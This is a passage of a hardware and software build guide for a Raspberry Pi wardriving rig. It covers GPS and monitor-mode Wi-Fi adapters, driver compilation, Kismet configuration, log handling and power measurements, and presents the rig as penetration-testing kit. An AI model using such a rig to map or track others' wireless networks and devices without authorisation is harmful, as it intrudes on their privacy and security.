• serial GPS module – This guide uses a u-blox NEO-6M serial GPS module, referred to as “serial GPS module”.
• Wi-Fi adapter – the USB Wi-Fi adapter selected by the reader, this article focuses on either the Panda
PAU09 or the Alfa AWUS036ACH.
• Command line conventions – Where there are commands that need to be entered, the command line will
be enclosed in a shaded box using the courier font, as follows:
• File modifications – Where files need to be edited, a brief description will be given enclosed in a shaded box
using the courier font. Additionally, a screenshot will be provided showing the final changes to the file. If the
file is very large, only the relevant section will be shown.
For this article, it is useful at the start to define goals and specifications for the unit. They are as follows:
• Low cost and ease of procurement of components, both hardware and software
• Use standard and freely available components, i.e. Commercial Off The Shelf (COTS)
• Use Open Source operating system and software, with ease of installation and use
• All of the components, hardware and software, have support from the “community” at large and/or from the
vendor/manufacturer
Full details of these design choices are discussed throughout this article.
Hardware
The hardware required and recommended in this article is, by design, selected for optimal performance, and all
components are readily available. Components can be sourced from mainstream online retailers, for example,
Amazon, or directly from the manufacturer.
The recommended hardware (where required, with the actual make and model in brackets) is as follows:
• USB Wi-Fi adaptor, 2.4GHz and 5GHz capable (either the Panda PAU09 or Alfa AWUS036ACH)
• GPS module with serial interface (u-blox NEO-6M serial GPS module)
• Antenna, omni directional, possibly with attenuation (Kent Britain 2 - 26 GHz Planar antenna)
• Case
There are some “optional” extras, that will be useful as part of the construction and testing of the unit, some of these
are not actually required for the final build, however most makers/electronic enthusiasts will have them on hand. They
are:
• Basic Digital Voltmeter (DVM), an essential tool; entry level models are very inexpensive, less than $10 USD
• Jumper cables with dupont connectors (a selection, with both male and female pins)
• Soldering iron and associated tools, for example, crimper tool, wire cutter, etc.
Raspberry Pi 4, 4GB – The 4GB version is recommended. Compiling Kismet will be more reliable; on a Raspberry Pi 3+
or a lower RAM Raspberry Pi 4, it is probable that Kismet compilation will fail.
In operation, more RAM will be advantageous in target environments with high numbers of Wi-Fi devices. More RAM is
always better, although this will slightly increase the total cost of the
unit.
Micro SD card – Choice of micro SD card is critical for the performance, stability and reliability of the unit. For micro
SD card selection, it is NOT a simple case of evaluating manufacturers stated performance metrics. This is mainly
because the performance metrics used by manufacturers are targeted at a different use case, i.e. for use with (still or
video) digital cameras, this use case is for large sequential file transfers. Furthermore, the SD Association
(https://www.sdcard.org/index.html), which defines micro SD card specification, defines performance metrics that
are “minimum” values, hence, micro SD cards can perform better than the specification!
Therefore, it is most useful to be able to evaluate the performance of any given micro SD card independently, i.e.
yourself. Furthermore, once the performance has been determined, it provides vital diagnostic intelligence for
pinpointing faults and problems, and for eliminating what may otherwise appear to be a “bug”.
There are several main considerations with the micro SD card selection, for example;
• Capacity/storage size
• Bandwidth/speed
• Reliability/longevity
Capacity/storage size – Generally speaking, and to a certain extent, this is driven by manufacturers and market
demands. In other words, there is a continuous trend to increase storage capacity and lower price (price per GB).
Bandwidth/speed – Manufacturers’ specifications for speed are based on the speed of transfer of files, especially
large files. Manufacturers are just beginning to produce specifications for read/write performance, for example the A2
standard. However, it is ALWAYS recommended to carry out performance tests, this is detailed in the appendix.
In practice, bandwidth can be subdivided by how the micro SD card is used, for example:
• To create and flash the micro SD card – The UHS II standard helps here as it does facilitate very quick
creation/flashing of the micro SD card.
• Using the micro SD card in the Raspberry Pi – Unfortunately, the Raspberry Pi does not utilise the additional
speed/bandwidth of UHS II, so there will be no benefit in operation of the unit.
Reliability/longevity – There are two points to consider:
• Mechanical/physical connectivity issues, i.e. the capability for the micro SD card to be inserted and removed many
times, and physical wear and tear on the connectors (both the micro SD card and the Raspberry Pi itself). Typically, this
should not be an issue, however, it should still be considered.
• Wear levelling capability of the micro SD card. Over time, wear is going to be a “fact of life”.
The above two points underline that it is prudent to have a suitable supply (or backup inventory) of micro SD cards.
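As a rough first check of a card's bandwidth, sequential write and read throughput can be measured with dd. This is only a sketch and is not the test procedure from the appendix: it assumes GNU dd on Linux, it measures large sequential transfers only (the use case the manufacturers already quote), and the function name sd_seq_test is hypothetical. Small random read/write performance, which matters more for a running operating system, needs a dedicated benchmark tool.

```shell
# Write a test file and read it back, letting dd report the throughput.
# $1 = directory on the card under test (default: current directory)
# $2 = size of the test file in MiB (default: 256)
sd_seq_test() {
    dir="${1:-.}"
    mib="${2:-256}"
    file="$dir/sdtest.$$"
    # conv=fsync forces the data onto the card before dd reports a speed
    dd if=/dev/zero of="$file" bs=1M count="$mib" conv=fsync || return 1
    # The read-back may be served from the page cache; for an honest figure
    # drop the caches first (as root): sync; echo 3 > /proc/sys/vm/drop_caches
    dd if="$file" of=/dev/null bs=1M || { rm -f "$file"; return 1; }
    rm -f "$file"
}

# Example, run on the Raspberry Pi with the card mounted as the root filesystem:
#   sd_seq_test /home/pi 256
```

Recording the figures for each new card makes it easier to spot a card that is degrading later on.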
USB Wi-Fi adaptor – The most critical factors determining the selection of the USB Wi-Fi adapter are;
• Driver availability/compatibility with the operating system used. MUST support “monitor mode”
The most important feature for the USB adapter is “monitor mode” capability. “Monitor mode” enables the capture of
RF/Wi-Fi packets on a given channel. Kismet, by default, “channel hops” at 5 channels per second.
RP-SMA connectors are standard for Wi-Fi devices, being mandated by the FCC. The connector is easily identified: on
the USB Wi-Fi adapter there is a male pin, and the antenna and/or cable will be female.
Using the above guidelines does somewhat limit USB Wi-Fi adapter selection, however, two very good choices are:
• Panda PAU09
• Alfa AWUS036ACH
Interestingly, the Alfa AWUS036ACH is marketed as a high gain antenna. When the case is opened (please respect any
potential warranty issues when opening), there is a small switch that selects a high gain or lower gain operation. This
can be useful (as described in more detail below) as high gain operation can make Wi-Fi discovery difficult, from the
perspective of receiving a signal from quite a distance, i.e. “out of scope”. More details of the various gain
specifications of the AWUS036ACH can be found in the appendix.
Active antenna for the serial GPS module – GPS signals come from very far away, roughly 20,000 km, so by the time
they reach the surface of the earth they are quite weak. Because of the weak signal (and some other factors), a clear
view of the sky is required. Amplification of the signal is recommended, applied as close to
the antenna as possible, as this improves the Signal to Noise Ratio (SNR). Fortunately, active antennas are readily
available, and most certainly recommended.
Antenna that is used for the USB Wi-Fi adaptor – The antenna used for Wi-Fi discovery is somewhat different
to the use case for GPS. Certainly, a good signal is required, however, not so that Wi-Fi signals are received from a mile
away, that would be out of scope. Furthermore, ONLY for discovery, an omni directional antenna is preferable, so that,
as much as is possible, the signal received is the same strength from all angles.
Also, RP-SMA connectors, as in the above specification for USB Wi-Fi adapter, means that the antenna can be
swapped out for a high gain, even directional antenna to pinpoint the location of particularly difficult devices, and, of
course, when “packet injection” tests/attacks are carried out (this is out of scope for this article, but almost certainly
will be of interest to some specialists).
GPS unit - The u-blox NEO-6M is not the most modern GPS module, the most common versions have a ROM image
from 2011, which is the most up-to-date version! However, despite the age, they are suitable for Wi-Fi discovery,
inexpensive and freely available with a serial interface.
These serial GPS modules can be packaged with an integrated antenna and/or with a U.FL connector. Using the U.FL
connector, a “pig tail” can be used to connect an active antenna. In most cases, an active antenna is recommended.
Case – It is prudent to mount all of the components in a protective case. Antennas should be mounted in such a way
that they are not obstructed. Special care must be taken if the antennas are covered, as it is most likely that this will
change the antenna’s frequency response and potentially limit reception.
Power source – A detailed analysis of the current usage of the unit with different configurations is in the appendix.
In summary, a power source that supplies 5.1 volts and can sustain the unit's maximum current draw of 2 Amps is
required. If using a power bank/battery, the run time of the unit will depend on the capacity, which is typically
specified in mAh (milliampere-hour).
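The relationship between capacity and run time is simple arithmetic: hours are roughly capacity (mAh) divided by average current draw (mA). The sketch below works it through; the optional efficiency factor is an assumption added here to allow for conversion losses in a power bank, and the function name runtime_hours is hypothetical.

```shell
# Estimated run time in hours = capacity (mAh) / average draw (mA) * efficiency.
# $1 = capacity in mAh, $2 = average draw in mA, $3 = efficiency (default 1)
runtime_hours() {
    awk -v cap="$1" -v draw="$2" -v eff="${3:-1}" \
        'BEGIN { printf "%.1f\n", cap / draw * eff }'
}

# runtime_hours 10000 2000        # ideal case: prints 5.0
# runtime_hours 10000 2000 0.8    # assuming 80% usable capacity: prints 4.0
```

Using the 2 Amp maximum gives a worst-case figure; the measured currents in the appendix will give a more realistic estimate.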
Of course, the OS must be installed first, however, the other steps, can be carried out individually, though each section
must be fully completed!
● Base Operating System - Raspbian Buster will be the base Operating System (OS) used in this guide
○ Panda PAU09
○ AWUS036ACH
● sqlite3 – This will be used to perform maintenance and to provide access to the Kismet database
● SSH– enabled as part of the base OS install, whilst not essential it will greatly assist with the build process
To install the base operating system, Raspbian Buster (which is based on Debian 10), download the image from:
https://www.raspberrypi.org/downloads/raspbian/
All of the above versions will work with this guide, however, some extra steps will be required with the “Lite” version.
The extra steps will be highlighted.
Burn the Raspbian image (downloaded from the above link) using balenaEtcher:
https://www.balena.io/etcher/
This is the first part of the 3-part flashing process. Start balenaEtcher.
Select drive. At this point, if you have not inserted the micro SD card, do so now:
With Raspbian image and micro SD card selected, click “Flash!” to flash image to micro SD card:
Flashing is in progress.
The micro SD card can now be inserted in the micro SD slot on the Raspberry Pi. Connect the monitor, keyboard and
mouse and finally, after connecting all of the required devices, the power supply unit (PSU). If the PSU has a switch, turn
it on now. Wait for the Raspberry Pi to fully boot up.
Assumptions
It is assumed that the following is carried out after the Raspberry Pi has booted completely for the first time:
• Create a specific, dedicated user for Kismet, together with a strong, secure password
• Change the hostname from the default “raspberrypi” – Use the raspi-config utility
N.B. For this article the default “pi” user and “raspberrypi” hostname will be used. These must be
changed for operational use; where they appear in this guide, substitute your own user name and
hostname as appropriate.
● Set locale, time zone and keyboard layout to suit – Use the raspi-config utility
○ Before the first boot - Create a zero-length file called “ssh” in the FAT 32 partition on the micro SD card
(when mounted the FAT 32 partition is /boot)
○ After the first boot - Use the raspi-config utility to enable ssh after the initial login
sudo apt-get update && sudo apt-get upgrade -y && sudo reboot
N.B. This step will be repeated several times in this guide. If the guide is followed in a single session,
from start to finish, then this step need only be carried out once.
• Install synergy (optional, however, this will enhance the user experience during the build process significantly)
Of course, other specific configurations and changes can be made to enable additional functionality, however, it is
recommended that unless it offers a distinct benefit or “quality of life” enhancement, these configurations and
additions are carried out AFTER this guide has been completed and demonstrated to function correctly.
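The "before the first boot" method of enabling SSH described above, a zero-length file called “ssh” in the FAT 32 partition, can be sketched as follows. The function name enable_ssh_marker is hypothetical, and the mount point in the example is an assumption that varies with the operating system used to flash the card.

```shell
# Create the empty "ssh" marker file in the boot (FAT 32) partition.
# $1 = mount point of that partition on the machine used for flashing
enable_ssh_marker() {
    boot="$1"
    [ -d "$boot" ] || { echo "not a directory: $boot" >&2; return 1; }
    : > "$boot/ssh"    # creates (or empties) the file; its content is irrelevant
}

# Example (substitute the real mount point):
#   enable_ssh_marker "/media/$USER/boot"
```

After the first boot the same result is reached with the raspi-config utility, as listed above.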
Install gpsd
The installation and configuration of gpsd is a standalone process, so it can be completed individually, after the
Raspbian first boot, or added retrospectively.
A serial GPS module will be used. The GPS module will connect to the Raspberry Pi 4 GPIO header. By default, a serial
console is configured on the GPIO header. To correctly install the serial GPS module, the following is required:
• Enable the serial interface/port on the Raspberry Pi for the GPS module to use
• Configure gpsd
• Test
Disable the default serial login shell and enable the serial interface
To disable the default serial console and enable serial interface ready for the serial GPS module to use:
sudo raspi-config
Configure gpsd
• /etc/default/gpsd
• /lib/systemd/system/gpsd.socket
Edit /etc/default/gpsd:
sudo vi /etc/default/gpsd
USBAUTO="false"
DEVICES="/dev/serial0"
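A quick way to confirm that the two settings were saved as intended is to grep for them. The sketch below is an optional check, not part of gpsd itself, and the function name check_gpsd_defaults is hypothetical. It deliberately looks for plain ASCII double quotes, because typographic quotes pasted from a PDF or web page are a common reason for such a file being silently misread.

```shell
# Succeed only if the gpsd defaults file contains both settings from this guide,
# written with plain ASCII double quotes.
# $1 = path to the file (default: /etc/default/gpsd)
check_gpsd_defaults() {
    f="${1:-/etc/default/gpsd}"
    grep -q '^USBAUTO="false"' "$f" && grep -q '^DEVICES="/dev/serial0"' "$f"
}

# Example:
#   check_gpsd_defaults && echo "gpsd defaults look correct"
```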
sudo vi /lib/systemd/system/gpsd.socket
Remove the following line. This disables the IPv6 listener, which, if configured, will prevent correct startup of gpsd:
ListenStream=[::1]:2947
ListenStream=0.0.0.0:2947
Now that the configuration of gpsd has been changed, the new settings need to be activated. Either reload and restart
or simply reboot!
or
sudo reboot
If it’s not already, the serial GPS module should now be connected. It is CRITICAL that the Raspberry Pi be shut down
and powered off before the module is connected. Full details of the “electrical” connection of the serial GPS module
are provided in the appendix GPS module wiring.
gpsmon
N.B.2. If using an SSH client, depending on the configuration of that client, the screen may not render
correctly. For example, if using PuTTY, select “change settings…”, then Window -> translation, change
the “remote character set” to “use font encoding”. Apply and now the gpsmon screen will render
correctly.
Wi-Fi adapters
1. Evaluate Wi-Fi adapter capability – Firstly, ensure that the Wi-Fi adapter is recognised by the
Raspberry Pi and check whether the Wi-Fi adapter supports “monitor mode”. This not only serves as an
evaluation of the Wi-Fi adapter’s capability, it also forms the basis of unit diagnostics
2. Install AWUS036ACH drivers – The drivers and kernel modules for the AWUS036ACH are not
included in the base Raspbian installation. Therefore, the driver and kernel module need to be installed
3. Disable Wi-Fi, Bluetooth and wpa_supplicant – Wi-Fi, Bluetooth and wpa_supplicant are potential
sources of “interference/disruption” for the unit, therefore, these will be disabled
N.B. For this section of the guide, Wi-Fi, Bluetooth and wpa_supplicant must be disabled last, as is
detailed in this section.
The screenshots here are for the Panda PAU09 Wi-Fi adapter. Drivers/kernel modules are:
Driver/module version
At this point, insert the Wi-Fi adapter in the USB port. Firstly, it is necessary to determine if the adapter, at a
hardware level, is visible to Raspbian:
lsusb
Next is to determine if the Wi-Fi adapter has loaded the drivers and kernel modules, using lsmod. The unfiltered
output from lsmod is quite "busy"; a good way to overcome this is to grep for lines containing cfg80211. cfg80211 is
the configuration API for 802.11 devices in Linux. As such, whichever Wi-Fi adapter is used, it will interface with
cfg80211:
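The filtering described above can be done with a plain grep, or taken one step further so that only the modules depending on cfg80211 are listed. The following is a minimal sketch; the function name cfg80211_users is hypothetical, and it relies on the usual lsmod column layout (module, size, use count, used-by list).

```shell
# Read lsmod output on stdin and print the modules that depend on cfg80211,
# one per line.
cfg80211_users() {
    awk '$1 == "cfg80211" && NF >= 4 {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) print m[i]
    }'
}

# On the unit:
#   lsmod | grep cfg80211      # quick look at every line mentioning cfg80211
#   lsmod | cfg80211_users     # just the dependent driver modules
```

Any name printed here can then be passed to modinfo to obtain the driver version and other details.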
N.B. In the above screenshot, rt2x00lib is used by the Panda PAU09 and brcmfmac is used by the
Raspberry Pi 4 on board Wi-Fi.
Alternatively, dmesg can be used to determine which driver has loaded. However, some care and interpretation is
needed as the driver name is not always the same as the kernel module (see the section for installing the
AWUS036ACH drivers for an example of this):
Armed with the driver/kernel module name, the version (and other specific details) can be obtained. It is
recommended that a note is taken of the version number, which may help in diagnostics in the future:
As can be seen in the above screenshot, version: 2.3.0 is being used for the Panda PAU09 Wi-Fi adapter.
It is fundamental to the correct operation of the unit that the Wi-Fi adapter supports “monitor mode”. It is “monitor
mode” that allows the Wi-Fi adapter, and therefore Kismet, to discover Wi-Fi networks. Furthermore, not all Wi-Fi
adapters are equal in this respect and it is essential to understand if the chosen Wi-Fi adapter supports “monitor mode”.
To establish if the chosen Wi-Fi adapter is capable of “monitor mode”, the iw command is used:
iw phy1 info
The screenshot above shows that the Panda PAU09 does support “monitor mode”.
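The output of iw is long, so the check can also be scripted. The sketch below reads the output of iw on stdin and looks for “monitor” in the “Supported interface modes” section; the function name supports_monitor is hypothetical, and the phy number (phy1 here) is an assumption that depends on how many wireless devices are present.

```shell
# Succeed if "monitor" is listed under "Supported interface modes" in the
# `iw phyN info` output supplied on stdin.
supports_monitor() {
    awk '
        /Supported interface modes:/ { in_modes = 1; next }
        in_modes && /^[ \t]*\* /     { if ($2 == "monitor") found = 1; next }
        in_modes                     { in_modes = 0 }
        END { exit (found ? 0 : 1) }
    '
}

# On the unit:
#   iw phy1 info | supports_monitor && echo "monitor mode supported"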
A useful tool/utility is the lshw command, which is typically not installed by default:
There are many versions of the AWUS driver, the version used in this article is from the aircrack-ng project, v5.2.20.
This version of the AWUS036ACH driver works very well with the Raspberry Pi and Kismet.
Reboot the unit, this completes the install of the Kernel headers for Raspbian Lite:
sudo reboot
Rename the sub-directory to include the version number of the driver so as to act as a reminder of the version used:
mv rtl8812au rtl8812au-v5.2.20
cd rtl8812au-v5.2.20/
To successfully compile and install the drivers, two files need to be edited:
1. Makefile
2. dkms-install.sh
vi Makefile
Edit:
CONFIG_PLATFORM_I386_PC = y
Edit:
CONFIG_PLATFORM_ARM64_RPI = n
vi dkms-install.sh
ARCH=arm
sudo ./dkms-install.sh
N.B. If, for any reason, the above steps do not work or fail, run dkms-remove.sh before re-running
dkms-install.sh.
To check and verify the installation was successful, the same process as is detailed above is used. Screenshots are for
the AWUS036ACH.
lsusb
iw phy1 info
The onboard Wi-Fi and Bluetooth functionality are not of use to this unit, primarily because of lack of reception
(especially when the unit is enclosed in a case), further compounded by the difficulty of adding an external antenna. A
micro U.FL connector can be added to the Raspberry Pi, however, this requires an addition and modification to the
main board, the Printed Circuit Board (PCB). This is considered “out of scope” for this guide. It must be noted that the
Nexmon drivers can be used to add “monitor mode”, however, the above antenna constraints are not easily overcome.
Therefore, Wi-Fi, Bluetooth and wpa_supplicant will be disabled at this point.
edit /boot/config.txt:
sudo vi /boot/config.txt
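The exact lines added in the original screenshot are not reproduced here. As a hedged sketch, the onboard radios are normally disabled with device tree overlays in /boot/config.txt; the overlay names below are an assumption and depend on the firmware version, so check /boot/overlays/README on the unit before using them. The helper add_line_once is hypothetical and simply avoids adding the same line twice.

```shell
# Append a line to a file only if that exact line is not already present.
# $1 = file, $2 = line
add_line_once() {
    grep -qxF -- "$2" "$1" 2>/dev/null || printf '%s\n' "$2" >> "$1"
}

# On the unit, from a root shell (e.g. after `sudo -s`):
#   add_line_once /boot/config.txt 'dtoverlay=disable-wifi'
#   add_line_once /boot/config.txt 'dtoverlay=disable-bt'
# Older firmware may name the overlays pi3-disable-wifi and pi3-disable-bt.
# wpa_supplicant is a regular systemd service and can be disabled with:
#   systemctl disable --now wpa_supplicant
```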
Edit /etc/dhcpcd.conf:
sudo vi /etc/dhcpcd.conf
denyinterfaces wlan0
sudo reboot
The next part of the process is to establish that the Raspberry Pi onboard Wi-Fi is disabled.
Log in and check with the ip command that the onboard Wi-Fi adaptor is now disabled:
ip addr show
As can be seen above, the “onboard” wlan0 is not present. The “onboard” Wi-Fi is now disabled.
hcitool dev
The above screenshot shows that wpa_supplicant has been successfully disabled.
The installation of Kismet will use the latest stable release (as of September 2019), version 2019-09-R1. The process is
straightforward:
• Install dependencies
• Configure
cd ~
wget https://www.kismetwireless.net/code/kismet-2019-09-R1.tar.xz
tar -xvf kismet-2019-09-R1.tar.xz
cd kismet-2019-09-R1/
Compilation process:
./configure
make -j$(nproc)
N.B. This guide uses the default “pi” user. It is recommended that a new user is created with a strong
password; if so, adjust this step accordingly.
groups
• Binaries - /usr/local/bin/
Kismet configuration
Further configuration is needed to run Kismet from the command line with minimal, if any, command line options. The
ultimate objective is to be able to run Kismet with no command line arguments.
Some of the settings Kismet needs can be specified as command line options; however, these should not be needed
once a working installation is completed.
Therefore, the Wi-Fi interface (which has “monitor mode”), gpsd and a constant location for the output files need to be
configured. There are two ways to do this:
1. Use the specific configuration file (as per the table below)
2. Make a kismet_site.conf
The second option, creating a kismet_site.conf file, is preferred: only a few settings are required, and with
kismet_site.conf a single file is edited and maintained.
sudo vi /usr/local/etc/kismet_site.conf
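As an illustration of the three settings named above (Wi-Fi data source, gpsd and a fixed log location), the following Python sketch renders the text of a minimal kismet_site.conf. The interface name wlan1 and the log directory are assumptions for this example only and are not taken from the original guide; the gpsd host and port shown are the usual gpsd defaults.

```python
def render_kismet_site_conf(interface: str, log_dir: str,
                            gpsd_host: str = "localhost",
                            gpsd_port: int = 2947) -> str:
    """Return the text of a minimal kismet_site.conf override file."""
    lines = [
        "# Wi-Fi data source (the adapter that supports monitor mode)",
        f"source={interface}",
        "# Read position fixes from the local gpsd daemon",
        f"gps=gpsd:host={gpsd_host},port={gpsd_port}",
        "# Write all Kismet log files to one fixed directory",
        f"log_prefix={log_dir.rstrip('/')}/",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Hypothetical values: adjust the interface name and directory to the actual unit
    print(render_kismet_site_conf("wlan1", "/home/pi/kismet_logs"))
```

The printed text can be pasted into /usr/local/etc/kismet_site.conf; the log directory must already exist and be writable by the user running Kismet.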
Kismet is now ready to be tested and run for the first time.
Now that gpsd, Wi-Fi adapter and Kismet have all been installed and configured, next is to run Kismet and ensure that
all is functioning correctly and as expected. To run Kismet, simply type kismet at the command prompt:
kismet
If Kismet throws errors, the first place to look for further diagnostic information is the Kismet logs. Since these have
been integrated into the Kismet sqlite database file, checking them with a sqlite3 browser is the easiest method
(please see the appendix for a suggestion).
Now that the Kismet installation has been tested and is functioning as expected, it’s time to view the new Kismet UI.
To access the Kismet UI, open a browser and go to http://kismet_instance_IP:2501; for this example and the
following screenshots, the Kismet instance is running on 192.168.2.122, so http://192.168.2.122:2501 is used.
When accessing the Kismet instance for the first time, a new user and password prompt is presented.
After setting the new Kismet UI user and password, the home page is rendered, displaying a panel with discovered
devices. Beneath that panel is a second panel that can be switched between “Messages” and “Channels”.
Switching the lower panel to “Channels” displays the channels currently being monitored. This is a snapshot, so it will
change over time as Kismet hops between channels.
A device in the “discovered devices” panel can be highlighted and selected with a “right mouse” click to display more
detailed information of that device.
The “hamburger” menu in the top left corner of the screen can be selected to show “Settings”, “Data Sources”, “Memory
Monitor” and “Channel Coverage”.
Selecting “Data Sources” shows the details of the data source (that is, the Wi-Fi adapter) configured previously in
this guide, including the channels that are available for monitoring.
The Raspberry Pi used has a total of 4GB RAM, so it is important to be familiar with the “Memory Monitor” panel. In
this example, memory utilisation remains stable with over 2500 devices tracked.
Kismet now uses a sqlite3 database for data and logging. Under certain conditions, for example, if Kismet terminates
suddenly, it is probable that two files are left behind: the main sqlite3 database and a journal file,
which is a temporary database file created by the SQLite database management system.
To combine the two files, they need to be “vacuumed”. This is straightforward using the sqlite3 command line tool that
was previously installed on the Raspberry Pi.
After running the above command, a single, complete sqlite3 database file is generated. The generated file can then be
accessed using a sqlite3 browser, Python, etc…
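Since Python is mentioned as a way to access the database, the same clean-up can also be sketched with Python's built-in sqlite3 module. This is a minimal sketch rather than the exact command used in this guide; it assumes the journal file is still in the same directory as the database, so that SQLite can recover from it automatically when the database is opened. The function name is illustrative.

```python
import sqlite3


def vacuum_kismet_log(db_path: str) -> str:
    """Open a Kismet log, compact it with VACUUM and return the integrity status."""
    # isolation_level=None selects autocommit mode;
    # VACUUM cannot run inside an open transaction.
    conn = sqlite3.connect(db_path, isolation_level=None)
    try:
        conn.execute("VACUUM")
        # "ok" means SQLite found no corruption in the rebuilt file
        (status,) = conn.execute("PRAGMA integrity_check").fetchone()
        return status
    finally:
        conn.close()
```

Calling vacuum_kismet_log() with the path to the .kismet file should return "ok" for a healthy database. It is prudent to work on a copy of the log and its journal file rather than the originals.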
Conclusion
Wardriving and Wi-Fi discovery is alive and kicking! In fact, this article clearly demonstrates that with low cost
hardware and Open Source software, a wardriving rig can be readily built.
The unit built will form an essential part of a pentester’s kit. Furthermore, it can help address the various pitfalls
associated with other methods of Wi-Fi discovery and Wireless Intrusion detection systems.
Appendices
There are several prominent tools and utilities that are most useful for the creation, setup, configuration, maintenance
and operation of the unit. These are just suggestions; it is left to the reader to select any additional software
as required.
As far as possible, the software here is cross-platform, i.e. Windows, Linux and macOS compatible.
balenaEtcher
balenaEtcher has become the de facto utility for “flashing” images to storage devices (USB and micro SD card are
supported). It is simple to use, Open Source and available as a download for Windows, macOS and Linux.
Micro SD formatter
This utility is provided by the SD Association (SDA), with the (claimed) capability to "optimally" format
SD/SDHC/SDXC Cards, potentially increasing performance! Furthermore, it fully complies with the SD File System
Specification created by the SD Association (SDA).
PuTTY
PuTTY is an SSH and telnet client, developed originally by Simon Tatham and supported by a group of volunteers.
It is available for Windows and Linux (there is also a version for macOS). PuTTY is open source software
that is available with source code.
PuTTY is most useful after enabling ssh on the Raspberry Pi, allowing shell/console access to the Raspberry Pi.
WinSCP
WinSCP is an award-winning and popular SFTP and FTP client for Microsoft Windows. With its "file
manager" style interface, copying files between computers/servers is straightforward and intuitive. Supported
protocols include FTP, FTPS, SCP, SFTP, WebDAV and S3.
Synergy by Symless
Synergy is software that shares one mouse and one keyboard between multiple computers. Copy ‘n’ paste between
connected computers is also possible. One computer is configured as the server, other computers have a client that
connects via the network, so no additional hardware is required. Synergy works on Windows, macOS, Linux, and
Raspberry Pi.
Synergy is a “quality of life” enhancement whilst creating the unit, especially the copy ‘n’ paste feature!
DB Browser for SQLite
DB Browser for SQLite is a well-established (since 2003) database browser. It is available for Windows, macOS and
Linux. Furthermore, there is a “portable” version for Windows, which removes the need to install the application.
Using DB Browser for SQLite makes access to the various logs and data within the Kismet database file
straightforward.
https://sqlitebrowser.org/blog/portableapp-for-3-11-2-release-now-available/
The following table shows all of the major releases for Kismet so far in 2019.
Release version: 2019-09-R1
Date: 1 September 2019
Tarball download: https://www.kismetwireless.net/code/kismet-2019-09-R1.tar.xz
Notes: https://www.kismetwireless.net/development/release/release-20190901/
N.B. A comprehensive list of old releases, complete with download links can be found at
https://github.com/kismetwireless/kismet/releases
Additionally, to download a specific version from GitHub (in this example, 2019-08-R2), the following
command line can be used:
To determine the actual version number to use, query the git database from within a cloned repository:
git branch -a
• Github - https://github.com/kismetwireless/kismet.git
Several power measurements were taken. The primary use for these measurements is to ensure that a suitable power
source is used whilst the unit is in operation in the field. Furthermore, an estimate can be made of how long
the power source will last, although “real world” usage will show the actual amount of time the unit operates before the
power source can no longer provide sufficient power for correct operation of the unit.
For the purposes of measuring current, the unit can be subdivided into three main components, with current
measurements taken for each of the components:
1. Raspberry Pi 4
In addition to the above, each Wi-Fi adapter was isolated. Furthermore, there were two configurations used, with
either:
1. Panda PAU09
2. AWUS036ACH
To provide a far clearer understanding of current usage, graphs have been plotted for configurations using either the
Panda PAU09 or AWUS036ACH Wi-Fi adapters.
a. PAU09 1393 mA
b. AWUS 1314 mA
2. Serial GPS device drawing current from power on, for both configurations, similar levels, approximately 57 mA
– 58 mA
4. When starting Kismet, the Panda PAU09 Wi-Fi adapter is stopped, put into monitor mode, then restarted
5. Differences, from a current usage perspective, of how the two Wi-Fi adapter drivers operate
Interestingly, there is very little difference in “stable state” current usage between the two Wi-Fi
adaptors used, just 32mA in practice. “Stable state” is the point where the operating system has fully booted with
drivers loaded, Kismet is running, and the main hardware components are all attached, for example, the Wi-Fi adaptor,
serial GPS module and external active antenna.
Furthermore, a difference can be seen in how the Wi-Fi adaptor drivers work. The AWUS036ACH driver
does not operate in the same way as the PAU09 driver, and the way that Kismet interacts with the PAU09 driver is very
different.
It can be clearly determined that Kismet disables the PAU09 and, as can be seen in the chart above, pushes it into a
lower power mode. It then enables monitor mode and re-enables the PAU09. This does not occur with the
AWUS036ACH.
For the AWUS036ACH, once Kismet starts, the power consumption is reduced at regular time intervals; most likely
this is a consequence of the channel switching configuration of Kismet.
The table below shows total peak and “stable state” current consumption.
                                                     PAU09   AWUS036ACH
Peak current (all components) in mA                  1393    1314
Average stable state current (all components) in mA  884     916
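To illustrate how these figures can be turned into a rough estimate of how long a power source will last, here is a minimal Python sketch. The 10,000 mAh capacity and the 0.85 efficiency factor are assumptions chosen for illustration only; they are not measurements from this guide, and real power banks will differ.

```python
def estimated_runtime_hours(capacity_mah: float, current_ma: float,
                            efficiency: float = 0.85) -> float:
    """Estimate runtime in hours from battery capacity and average current draw."""
    if current_ma <= 0:
        raise ValueError("current_ma must be positive")
    # efficiency is an assumed, lumped factor for conversion and cable losses
    return capacity_mah * efficiency / current_ma


# Average stable state currents from the table above, in mA
STABLE_STATE_MA = {"PAU09": 884, "AWUS036ACH": 916}

if __name__ == "__main__":
    capacity_mah = 10_000  # hypothetical power bank capacity
    for adapter, current in STABLE_STATE_MA.items():
        hours = estimated_runtime_hours(capacity_mah, current)
        print(f"{adapter}: about {hours:.1f} h")
```

The result is only a starting point: the peak current figures still determine whether a given power source can start the unit at all, and field use remains the real test.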
Objective
Whilst manufacturers’ specifications do serve as a guide, it is frequently necessary to carry out speed and performance
tests of micro SD cards and, if used, external storage devices.
Another useful source of speed and performance data is the wealth of published tests. These are useful for indicative
purposes; however, they may not cover a specific make/model of micro SD card or external storage device, the guides
may simply be outdated, and some of the online guides use outdated versions of the test software/applications.
Some relevant and representative performance results and guides can be found at the following:
• https://www.pidramble.com/wiki/benchmarks/microsd-cards
• https://www.jeffgeerling.com/blogs/jeff-geerling/raspberry-pi-microsd-card
Methodology
The methodology used here is to use hdparm, dd and IOzone. This follows the methodology that is used in the
PiRamble script
(https://raw.githubusercontent.com/geerlingguy/raspberry-pi-dramble/master/setup/benchmarks/microsd-benchmarks.sh).
However, this guide uses a newer version of IOzone than the PiRamble script. Additionally,
it is beneficial to be able to run the tests individually; for example, this allows the reader to run a single test
multiple times to get an average, peak and minimum indication of performance.
• Initially carried out whilst the Raspberry Pi is NOT under CPU load
• Also, NOT whilst the unit is in operation, i.e. NOT running Kismet live
• Random read/write – Specifically for Raspbian and Linux systems a standard and accepted tool for random
read write tests is IOzone
N.B. It is NOT recommended to run these tests whilst using the unit operationally, in a live
environment!
This guide will detail how to use the tools individually, although of course the PiRamble test script can be used, with its
associated limitations.
The micro SD card used for booting the Raspberry Pi is typically referenced as this device:
/dev/mmcblk0
N.B. The above references the entire micro SD card, i.e. NOT individual partitions.
The screenshot below shows a listing for the entire micro SD card, together with partition 1 (last two characters p1)
that contains /boot a FAT32 partition and partition 2 (last 2 characters p2).
